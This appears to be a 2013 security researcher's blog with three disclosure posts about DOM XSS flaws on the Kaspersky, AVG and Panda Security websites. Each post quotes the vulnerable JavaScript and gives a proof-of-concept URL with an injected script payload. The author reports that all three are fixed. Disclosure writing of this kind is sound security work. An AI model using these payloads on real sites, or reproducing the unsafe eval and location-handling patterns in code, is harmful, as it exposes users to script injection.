Sunday, January 20, 2013

Kaspersky DOM XSS


Following my study on DOM XSS and antivirus vendors, I found that Kaspersky is also vulnerable to this type of vulnerability.
The problem is located on a bad validation of location.hash coming from jQuery (which is also outdated).
/*load current tab by url*/
//if($.url.param("tab")) $('a[name='+$.url.param("tab")+']').trigger('click');
var hash = location.hash;
if (hash.indexOf("tab=") != -1) {
hash = hash.replace(/^#tab=/, "");
$('a[name=' + hash + ']').trigger('click');

If a user loads the "tab" parameter on the URL it will execute the code.

Proof of concept:
http://www.kaspersky.com/tablet-security#tab=<img src=x onerror=prompt("xss");>


The Kaspersky team fixed this issue very fast and I would like to thank @assolini from Kaspersky for the support and the gift.

AVG vulnerable to DOM XSS


I discovered a DOM XSS vulnerability in AVG and it's located on download section of the oficial website.

Due to the lack of escaping/encoding the URL on the code present on file js_stdfull.js, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)
var pathname = $(location).attr('href');var urlparts = pathname.split("#"); 

Proof of concept:
http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>


This XSS vector worked fine with Chrome but you could changed it to work with other browsers also.
This issue is already been fixed but didn't got any reply from their team.

Thursday, January 10, 2013

Panda Security vulnerable to DOM XSS


Who is Panda?
Panda Security SL, formerly Panda Software, is a computer security company founded in 1990 by Panda's former CEO, Mikel Urizarbarrena, in the city of Bilbao, Spain. Initially centered on the production of antivirus software, the company has expanded its line of applications to include firewall applications, spam and spyware detection applications, cybercrime prevention technology, and other system management and security tools for businesses and home users.

Who uses it?
Panda Security is one of largest antivirus vendor worldwide, so it means lot's of clients.

What seems to be the issue?
There is a DOM XSS vulnerability present on the pandasecurity.com website.

Affected file: aHref.js (eval + location.href)

Vulnerable code: 
var Url = location.href; Url = Url.replace(/.*\?(.*?)/,"$1"); Variables = Url.split ("&"); for (i = 0; i < Variables.length; i++) { Separ = Variables[i].split("="); eval ('var _'+Separ[0].toLowerCase()+'="'+Separ[1]+'"'); }}
Proof of concept:
http://www.pandasecurity.com/security-promotion/antivirusoffer/portugal/?track=109197";alert("xss by @dsopas");//&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang";alert("xss by @dsopas");//

Both track and gclid are exploitable with this issue.

Feedback?
PandaSecurity fixed this issue very fast. My congrats to their support.